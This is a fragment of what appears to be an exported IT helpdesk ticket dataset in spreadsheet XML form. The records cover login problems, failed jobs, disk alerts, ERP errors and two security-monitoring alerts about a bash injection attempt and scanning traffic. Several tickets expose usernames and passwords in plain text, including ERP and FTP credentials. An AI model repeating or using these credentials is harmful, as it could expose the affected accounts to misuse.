    <s v="when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'_x000a__x000a_phone; "/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="13"/>
  </r>
  <r>
    <s v="telephony_software login issue - yakimp &amp; staszk"/>
    <s v="two users have a problem with logging into telephony_software system. qlzgbjck yzwnvbjt, login staszk and djskrgae dnckipwh, login yakimp. print screens attached. will you be able to assist? "/>
    <s v="ahydmrbu fjymgtvo"/>
    <x v="6"/>
  </r>
  <r>
    <s v="team sproc is not converting direct team revenue to employee currency code"/>
    <s v="team sproc is not converting direct team revenue to employee currency code"/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unlock erp SID_34 account "/>
    <s v="unlock erp SID_34 account "/>
    <s v="sazowuft htjrunsz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="zliatqeo nrukzxit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to the pc "/>
    <s v="unable to login to the pc "/>
    <s v="pqkthilr uitfqsen"/>
    <x v="0"/>
  </r>
  <r>
    <s v="businessobjects_cms : cms server watcher: server named HostName_995"/>
    <s v="businessobjects_cms: cms server watcher: server named HostName_995 "/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="my erp login appears not to be working"/>
    <s v="my erp login appears not to be working username wolfthry   password kasphryer1"/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software update"/>
    <s v=":803_x000a_summary:telephony_software update did not work"/>
    <s v="nxgutvrb pdsvfack"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the users qasdhyzm yuglsrwx (id: nasftgcijj) and rspqvzgu vroanwhu (id: silvgtyar1)"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the users qasdhyzm yuglsrwx (id: nasftgcijj) and rspqvzgu vroanwhu (id: silvgtyar1)_x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales org tab does not show up the field"/>
    <s v="sales org tab does not show up the field"/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1387 failed in job_scheduler at: 08/18/2016 11:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1387 failed in job_scheduler at: 08/18/2016 11:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ms crm online dash bankrd /opportunities issue."/>
    <s v="ms crm online dash bankrd /opportunities issue."/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open attachments in erp"/>
    <s v="unable to open attachments in erp"/>
    <s v="ubqiygva zdkfxyel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create dn"/>
    <s v="hi it _x000d__x000a__x000d__x000a_please assist o to create dn as i am not able to._x000d__x000a_"/>
    <s v="biwcuadk pvrgtzox"/>
    <x v="5"/>
  </r>
  <r>
    <s v="to help jdamieul  fandyhgg"/>
    <s v="_x000a__x000a_received from: ztdgvclp.gzcalstq@gmail.com_x000a__x000a_hello,_x000a_danghtnuell is having a connection problem._x000a_would you please get in touch with him?_x000a_615-  office phone number._x000a__x000a_"/>
    <s v="ztdgvclp gzcalstq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="account is locked"/>
    <s v="account is locked"/>
    <s v="jartombc ghnxkmsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2063b failed in job_scheduler at: 08/18/2016 10:29:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063b failed in job_scheduler at: 08/18/2016 10:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="reset the password for aliuytre j love-lewis on other / caas applications"/>
    <s v="i would like to reset my caas applications (remote and desktop connection) password.  itylnjqw kqiurhbt and thomklmas brrgtyant handles these request in our office .it is apart of the customer interaction phone system."/>
    <s v="ethwnzfb roqytnjk"/>
    <x v="6"/>
  </r>
  <r>
    <s v="ms outlook issue: ms crm dynamics issue"/>
    <s v="ms outlook issue: ms crm dynamics issue"/>
    <s v="ubkgydpw pqljsube"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue"/>
    <s v="440 _x000a_summary:i don't think i am receiving my email"/>
    <s v="fyigcxnm utgeyfsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dev/software file system on HostName_184 has consumed 86% of space"/>
    <s v="dev/software file system on HostName_184 has consumed 86% of space"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="46"/>
  </r>
  <r>
    <s v="virus detected on pc"/>
    <s v="virus detected on pc. please see attachment."/>
    <s v="nrugzxkl lohqkvry"/>
    <x v="49"/>
  </r>
  <r>
    <s v="erp  ecs tracking is not working resp. computer crashes "/>
    <s v="erp  ecs tracking is not working resp. computer crashes immediately when trying to get proof of delivery for ups shipments._x000d__x000a__x000d__x000a_del. note - header - ecs tracking and when clicking on proof of delivery erp stops  - tried several times - always the same"/>
    <s v="bsglvkdz twoibenz"/>
    <x v="48"/>
  </r>
  <r>
    <s v="account unlock request from herr schmidt : dnc430"/>
    <s v="account unlock request from herr schmidt : dnc430"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access the lunch menu on the hub"/>
    <s v="email:_x000a_from: renyhtuee a meayhtger _x000a_sent: thursday, august 18, 2016 5:10 pm_x000a_to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000a_subject: fw: renyhtuee a meayhtger wants to access 'lunch-menus'_x000a__x000a_can someone check on why i can't access lunch menus?  did something change in collaboration_platform?  this should be available to everyone!_x000a__x000a_best "/>
    <s v="wqxzleky uwjchqor"/>
    <x v="27"/>
  </r>
  <r>
    <s v="not able to login to hub"/>
    <s v="not able to login to hub_x000d__x000a__x000d__x000a_helped with email address and asked her to user after some time."/>
    <s v="feavxrlb krdhzfgc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="zjkqxsye bcsdlfuj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access collaboration_platform it homepage - "/>
    <s v="error: access denied (screenshot attached)._x000d__x000a_confirmed that gso and security admin team members are unable to access, possibly others as well._x000d__x000a__x000d__x000a_informed gvxfymjk euioadyf and khadfhty who are currently investigating._x000d__x000a__x000d__x000a_we are able to access other sites including cor relations, finance, markhtyeting and the gso subsite as well when accessed directly through url"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="canÂ´t do pgi for mm 5316075"/>
    <s v="+49 _x000a_SID_34 _x000a_error: item category  is not defined     message  -  no. vl324_x000a__x000a_i canÂ´t do the pgi for :_x000a_9168049095_x000a_8057945735_x000a_9168049015_x000a__x000a_ "/>
    <s v="qpiojxcl dxkcljew"/>
    <x v="17"/>
  </r>
  <r>
    <s v="snipping tool shortcut"/>
    <s v="snipping tool shortcut"/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze chat"/>
    <s v="ic: welcome, our next available agent will be with you shortly..._x000d__x000a_ic: interaction alerting agent._x000d__x000a_aytjedki rucfxpla: uacyltoe hxgaycze_x000d__x000a_aytjedki rucfxpla: this is sabrthy_x000d__x000a_ic: website visitor has joined the conversation_x000d__x000a_efbwiadp dicafxhv: hello sabrthy_x000d__x000a_efbwiadp dicafxhv: its working fine# _x000d__x000a_"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/18/2016 08:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/18/2016 08:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="uyjglskh lhurepnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00  "/>
    <s v="_x000d__x000a__x000d__x000a_received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/18/2016 07:59:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="HostName_173(erp - SID_8):  average (1 samples) disk free on /home is now 12%, which is below the warning threshold (15%)"/>
    <s v="HostName_173(erp - SID_8): average (1 samples) disk free on /home is now 12%, which is below the warning threshold (15%) out of total size 0.0 gb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="46"/>
  </r>
  <r>
    <s v="business_client &amp; erp gui issue"/>
    <s v="a couple of users (nmzfdlar whzbrusx, uwdqtrnx uhntgvyj) have reported the attached error when using the transaction code zwwirep."/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn unlock request : nk_prod"/>
    <s v="qlhmawgi sgwipoxn unlock request : nk_prod"/>
    <s v="bedzliqs xazbjvmc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="possible bash command injection attempt "/>
    <s v="dsw in33637966_x000d__x000a__x000d__x000a_we are seeing '50990 vid63154 possible bash command injection attempt - bash in http header (incoming)' alerts being generated by your isensor03.company.com/10.32.100.17 device indicating that one or more hosts, including 220.202.123.178, are attempting to discover whether one of your internet-facing devices, including 10.250.1.13/clhqsm010, is vulnerable to a bash shell remote code execution vulnerability (cve-2014-6271). successful exploitation of these vulnerabilities may result in information disclosure or remote code execution. as the traffic in these alerts indicates an attempt to exploit said application, we are escalating this matheywter to you via a medium priority ticket. _x000d__x000a_ _x000d__x000a_blocking each source ip address may not be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate your environment to determine whether you are running a vulnerable version of the application being targeted. "/>
    <s v="afkstcev utbnkyop"/>
    <x v="46"/>
  </r>
  <r>
    <s v="'internal outbreak for 7/udp'"/>
    <s v="dsw in33638260_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 54.96.80.216/att-singapore-asa.company.com-1 device generating at least 254 'internal outbreak for 7/udp' alerts within 10 minutes, for traffic (blocked) from awyl9912395/10.38.28.239 to port 7/udp of several internal hosts. this may indicate unauthorized reconnaissance scanning, a misconfiguration, or authorized internal discovery being blocked by the firewall.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
    <s v="afkstcev utbnkyop"/>
    <x v="49"/>
  </r>
  <r>
    <s v="'repeat outbound connection for 135/tcp' "/>
    <s v="dsw in33638700_x000d__x000a__x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from ldgl8513807/10.24.14.230 to port 135/tcp (remote procedure call (rpc)) of external host 220.250.64.225.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
    <s v="afkstcev utbnkyop"/>
    <x v="2"/>
  </r>
  <r>
    <s v="machine stuck on welcome screen "/>
    <s v="machine stuck on welcome screen "/>
    <s v="umkpayhc adflvbxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rma customer return error"/>
    <s v="billing 0158655822 , inwarehouse_tool 415464 _x000d__x000a_customer return not processed correctly_x000d__x000a_when input billing 0158655822, the material isn't copied from the reference."/>
    <s v="cxfrvtyn rapoejyb"/>
    <x v="12"/>
  </r>
  <r>
    <s v="urgent : user : vvspecmfrt : please reactivate account."/>
    <s v="user : vvspecmfrt : please reactivate account._x000d__x000a__x000d__x000a_from 18.august.2016 till 28.february.2017 it should be active."/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="19"/>
  </r>
  <r>
    <s v="monitor on rqxw8515251 is out."/>
    <s v="monitor on rqxw8515251 is out."/>
    <s v="xdabnget wryuikgd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="very urgent: reset windows password"/>
    <s v="_x000a__x000a_received from: oslzvpgk.nhwsxgpb@gmail.com_x000a__x000a_good day_x000a__x000a_htnvbwxs gwfrzuex has already issued a ticket for this â€“ please address aerp!_x000a__x000a_please reset windows password for rhgteini_x000a__x000a__x000a_"/>
    <s v="oslzvpgk nhwsxgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype does not open."/>
    <s v="skype does not open."/>
    <s v="qicmfaoe hdrysife"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook does not open."/>
    <s v="outlook does not open."/>
    <s v="qicmfaoe hdrysife"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password cannot changed"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tbukjcyl.lxncwqbj@gmail.com_x000d__x000a__x000d__x000a_dear all_x000d__x000a_could you please help me to fix it,_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f978.729627d0]_x000d__x000a__x000d__x000a_best "/>
    <s v="tbukjcyl lxncwqbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tess installation "/>
    <s v="tess installation "/>
    <s v="qxmujhwg rsgqidxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attendance_tool password"/>
    <s v="_x000a__x000a_received from: dwafrmth.oabwzitv@gmail.com_x000a__x000a_hi_x000a__x000a_i have forgotten the attendance_tool password my user id is 20452489_x000a__x000a__x000a_with best "/>
    <s v="dwafrmth oabwzitv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue in business_client"/>
    <s v="_x000d__x000a__x000d__x000a_received from: eakhgxbw.pfyadjmb@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_i am facing issue in opening business_client._x000d__x000a__x000d__x000a_getting following error msg._x000d__x000a__x000d__x000a_pl help on this._x000d__x000a_[cid:image009.jpg@01d1f967.2e19de50]_x000d__x000a_"/>
    <s v="eakhgxbw pfyadjmb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mitarbeiter reichenberg philipp benÃ¶tigt berechtigung fÃ¼r den ordner file:///m:\ce_leiter"/>
    <s v="mitarbeiter reichenberg philipp benÃ¶tigt berechtigung fÃ¼r den ordner file:///m:\ce_leiter"/>
    <s v="egklxsoy hivwzjcf"/>
    <x v="33"/>
  </r>
  <r>
    <s v="printer not working "/>
    <s v="printer not working "/>
    <s v="vncowmbd hyfzcqpi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for fniqhjtg qrfuetpw on windows login"/>
    <s v="please reset users windows password to welcome1, as she is having issues logging in."/>
    <s v="fniqhjtg qrfuetpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker an messmaschine r173 in halle b hat stÃ¤ndig papierstau."/>
    <s v="drucker an messmaschine r173 in halle b hat stÃ¤ndig papierstau."/>
    <s v="frzjtmyk wzacvhki"/>
    <x v="32"/>
  </r>
  <r>
    <s v="access new payroll site"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cvqnstgu.ofnimlwx@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_i have been having an issue with being able to gain access to make approvals for our new payroll site._x000d__x000a__x000d__x000a_they have advised the issue is with my browser._x000d__x000a__x000d__x000a_below is the email trail on the issue._x000d__x000a__x000d__x000a_can i get some assistance to rectify the problem?i don't want to download the wrong browser._x000d__x000a__x000d__x000a__x000d__x000a_to all_x000d__x000a__x000d__x000a_who should i contact to resolve this issue?_x000d__x000a__x000d__x000a_"/>
    <s v="cvqnstgu ofnimlwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to see drawings in business_client"/>
    <s v="not able to view/download tool drawings over business_client._x000a__x000a_summary:business_client - refer call by mr. dwfiykeo argtxmvcumar"/>
    <s v="qxmujhwg rsgqidxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iqmhjlwr.jqmxaybi@gmail.com_x000d__x000a__x000d__x000a_please can you help me. i am experiencing nearly 90 min delay on my incoming e-mails as per below screenshot_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f93f.11ea7910]_x000d__x000a__x000d__x000a_"/>
    <s v="iqmhjlwr jqmxaybi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="win installation image for russia office"/>
    <s v="_x000a__x000a_received from: koahsriq.wdugqatr@gmail.com_x000a__x000a_good day all_x000a__x000a_we need to rebuild 1 win 7 laptop and 1 new with win 7 image. could you please download actual images on our ftp (credential below)? usually romftguald helping us with this kind of downloading but now he is unavailable_x000a__x000a_ftp:\\ftp.terralink.ru_x000a_login: company_x000a_password: companymet@l_x000a__x000a__x000a_Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,_x000a_ÐµÐ²Ð³ÐµÐ½Ð¸Ñ._x000a__x000a__x000a_koahsriq wdugqatr,_x000a_administrative assistant._x000a_koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;_x000a__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="65"/>
  </r>
  <r>
    <s v="mail access in mobile"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rsvminjz.tcpqvbae@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_provide me the mail access for mobile. encl the details._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rsvminjz tcpqvbae"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the attached 7 initiatives in &quot;director approved&quot; status, but cannot be released"/>
    <s v="per subject, i have changed the status to &quot;director approved&quot;, but cannot release. error message &quot;enter channel manager&quot;, but in account details, the cm is available. can you please solve?"/>
    <s v="mqzirjkb umbgreyq"/>
    <x v="14"/>
  </r>
  <r>
    <s v="erp login issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: csmtowqn.ulpjtgfo@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_iam getting the below error while trying to login. kindly help._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f958.2cf09e60]_x000d__x000a__x000d__x000a_best "/>
    <s v="csmtowqn ulpjtgfo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="purchasing zitec catalogue does not work in SID_34"/>
    <s v="whenn accessing the catalog the company logon data are missing (userid and password are not given)_x000d__x000a_in SID_1 it works in SID_34 not. please check."/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="installation of engineering tool/engineering_tool/google chrome/winrar/"/>
    <s v="_x000d__x000a__x000d__x000a_received from: irqpwgtn.dpautgeh@gmail.com_x000d__x000a__x000d__x000a_dear concern,_x000d__x000a__x000d__x000a_please install all related apps to my laptop as i got new laptop._x000d__x000a__x000d__x000a_with best "/>
    <s v="irqpwgtn dpautgeh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sipppr routing to demand planners not working ... sippprs get routed to admin"/>
    <s v="as of this morning, the routing for sippprs to demand planners seems to be broken."/>
    <s v="ftnijxup sbltduco"/>
    <x v="20"/>
  </r>
  <r>
    <s v="netzteil an der docking station ohne funktion."/>
    <s v="netzteil an der docking station ohne funktion._x000d__x000a__x000d__x000a_ext : 673_x000d__x000a_"/>
    <s v="shkwgxln ikpvtjgn"/>
    <x v="28"/>
  </r>
  <r>
    <s v="browserproblem mit hub "/>
    <s v="_x000a__x000a_received from: mnakehrf.mvunqihf@gmail.com_x000a__x000a_guten tag,_x000a_the hub lÃ¤sst sich an meinem rechner nicht Ã¶ffnen._x000a_der bildschirm â€žbaut&quot; sich nicht auf. einige wenige male funktioniert es._x000a_auf anderen rechnern funktioniert es. browserproblem?_x000a__x000a_[cid:image001.png@01d1f935.373777e0]_x000a__x000a__x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_mnakehrf mvunqihf_x000a_analyst payroll_x000a_mnakehrf.mvunqihf@gmail.com&lt;mailto:mnakehrf.mvunqihf@gmail.com&gt;_x000a__x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_"/>
    <s v="mnakehrf mvunqihf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to sign in collaboration_platform,"/>
    <s v="_x000a__x000a_received from: qubywmgf.jouickqx@gmail.com_x000a__x000a_that didn't work_x000a_we're sorry, but qubywmgf.jouickqx@gmail.com can't be found in the company.collaboration_platform.com directory. please try again later, while we try to automatically fix this for you._x000a_here are a few ideas:_x000a_[_x000a_click here to sign in with a different account to this site.&lt;javascript:loginasanother('\u002f_layouts\u002fcloseconnection.aspx?loginasanotheruser=true\u0026source=\u00252f',1)&gt;_x000a_this will sign you out of all other office 365 services that you're signed into at this time._x000a_[_x000a_if you're using this account on another site and don't want to sign out, start your browser in private browsing mode for this site (show me how)&lt;_x000a_if that doesn't help, contact your support team and include these technical details:_x000a_correlation id: 01ec9a9d-7035-2000-1602-ce2ff57c84f1_x000a_date and time: 8/18/2016 12:35:10 am_x000a_url: _x000a_user: qubywmgf.jouickqx@gmail.com_x000a_issue type: user not in directory._x000a__x000a__x000a_for company_x000a__x000a_athjyul dixhtyuit_x000a_senior manager sales - north ( msg)_x000a_qubywmgf.jouickqx@gmail.com&lt;mailto:qubywmgf.jouickqx@gmail.com&gt;_x000a__x000a_companytm_x000a__x000a__x000a__x000a_"/>
    <s v="qubywmgf jouickqx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software-software upgrade funktioniert nicht"/>
    <s v="telephony_software-software upgrade funktioniert nicht. pc: empl8111412_x000d__x000a_vor dem start des upgrades wurden alle programdntyme geschlossen._x000d__x000a_nach dem start des upgrades erschien folgende fehlermeldung &quot;wusa.exe - anwendungsfehler&quot; (siehe datei)_x000d__x000a_nach der bestÃ¤tigung mit &quot;ok&quot; wurde anwendung geschlossen und der upgrade nicht durchgefÃ¼hrt._x000d__x000a__x000d__x000a_translation : _x000d__x000a_telephony_software software upgrade does not work. pc: empl8111412_x000d__x000a_before starting the upgrade, all programdntys have been closed._x000d__x000a_after starting the upgrade following error message appeared &quot;wusa.exe - application error&quot; (see file)_x000d__x000a_after confirming with &quot;ok&quot; application is closed and the upgrade is not performed._x000d__x000a_"/>
    <s v="bqyfwclo osjklifb"/>
    <x v="32"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1338"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1338 at 08/18/16 02:54:34"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1388"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1388 at 08/18/16 02:54:34"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="tess issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ufgkybsh.ijswtdve@gmail.com_x000d__x000a__x000d__x000a_dear sir/mam,_x000d__x000a__x000d__x000a_i am facing issue with tess software. kindly help me to resolve the issue._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f94b.49e78c70]_x000d__x000a__x000d__x000a_"/>
    <s v="ufgkybsh ijswtdve"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1332"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1332 at 08/18/16 02:51:35"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="engineering_tool not opening"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qmpyjfbn.zlyiwtch@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please help to resolve the below issue while opening engineering_tool, will be available in office for next 1 hour._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f947.8d282e30]_x000d__x000a__x000d__x000a_"/>
    <s v="qmpyjfbn zlyiwtch"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wireless access point prÃ¼fen geb.14 ,geb16 und konferenzraum geb.2 \xmlbfjpg yegzbvru"/>
    <s v="wireless access point prÃ¼fen geb.14 ,geb16 und konferenzraum geb.2 \xmlbfjpg yegzbvru"/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="24"/>
  </r>
  <r>
    <s v="business_client error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zcyueotq.ehvpaqnf@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_i am getting below error when i open business_client_x000d__x000a__x000d__x000a_[cid:image004.jpg@01d1f946.9ca4fba0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with "/>
    <s v="zcyueotq ehvpaqnf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit lan \ewew8323735 \xwirzvda okhyipgr"/>
    <s v="probleme mit lan \ewew8323735 \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit lan  \ewew8323862 \xwirzvda okhyipgr"/>
    <s v="probleme mit lan  \ewew8323862 \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="wireless access point funktioniert nicht \jxphgfmb gjbtuwek"/>
    <s v="wireless access point funktioniert nicht \jxphgfmb gjbtuwek"/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="vnc-zugriff auf empwx000189 (sk-presserei germany) geht nicht mehr"/>
    <s v="fehlermeldung &quot;failed to connect to server&quot;. lt. kollegen in der sk-presserei ist die pc-nummer aber richtig, und der pc wurde auch nicht ausgetauscht oder erneuert. danke!"/>
    <s v="ozphysqw pgcmwqze"/>
    <x v="32"/>
  </r>
  <r>
    <s v="goods movement mb11"/>
    <s v="hello,_x000a__x000a__x000a_please let me know how to conduct goods movement with mb11 for mm#6545035 / 6100063 which are not accepted._x000a__x000a_ _x000a__x000a_*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*_x000a_æ ªå¼ä¼šç¤¾ã€€ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³_x000a_ãƒ—ãƒ­ã‚¸ã‚§ã‚¯ãƒˆã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢_x000a_ç”°æ‘ã€€å°šä¿Š_x000a_iwazgesl ydgqtpbo_x000a_project engineer &amp; supply chain logistics_x000a_company k.k._x000a__x000a_e-mail: iwazgesl.ydgqtpbo@gmail.com_x000a_*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*_x000a__x000a_ _x000a_ï¼ˆå¼Šç¤¾ã¯2016å¹´1æœˆ1æ—¥ã‚ˆã‚Šä¼šç¤¾åã‚’æ ªå¼ä¼šç¤¾ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³ã¸å¤‰æ›´è‡´ã—ã¾ã—ãŸã€‚ï¼‰_x000a_"/>
    <s v="iwazgesl ydgqtpbo"/>
    <x v="29"/>
  </r>
  <r>
    <s v="cancel migo entry  for po5018096568 (5321) "/>
    <s v="_x000d__x000a__x000d__x000a_received from: neokfwiy.ufriscym@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_due to the goods delivery issue by plant_298, please help to reverse the migo entry  material doc. 6126951797 /accounting doc. 6111167039, also need you help to reverse the good issue doc. 5011169990, the d/n 9168984815 has been cancelled._x000d__x000a__x000d__x000a_[cid:image002.png@01d1f956.6d0ac0e0]_x000d__x000a__x000d__x000a_[cid:image003.png@01d1f956.fb694960]_x000d__x000a__x000d__x000a_[cid:image001.png@01d1f957.983fbd00]_x000d__x000a__x000d__x000a_best "/>
    <s v="neokfwiy ufriscym"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ç”µè„‘å¡ä¸”è¿žä¸ä¸Šå†…ç½‘"/>
    <s v="_x000a__x000a_received from: tuqrvowp.fxmzkvqo@gmail.com_x000a__x000a_ç”µè„‘å¡ä¸”è¿žä¸ä¸Šå†…ç½‘ï¼Œè¯·è½¬è´ºæ­£å¹³_x000a__x000a__x000a__x000a_tuqrvowp fxmzkvqo é’±å”é‘«_x000a_human resources_x000a_tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;_x000a__x000a_ä¸­å›½ä¸Šæµ·å¥‰è´¤é™ˆæ¡¥è·¯1508å·_x000a__x000a_"/>
    <s v="tuqrvowp fxmzkvqo"/>
    <x v="30"/>
  </r>
  <r>
    <s v="fe08 doesn't work in erp"/>
    <s v="when i print oa in erp and choose the fe08, fe08 doesn't work . but it's work when i print excel/word/pdf files ._x000a_my erp id:wrtyuh2  _x000a_the matheywter is also happened with  erp id: fufrtal._x000a_"/>
    <s v="xqyjztnm onfusvlz"/>
    <x v="0"/>
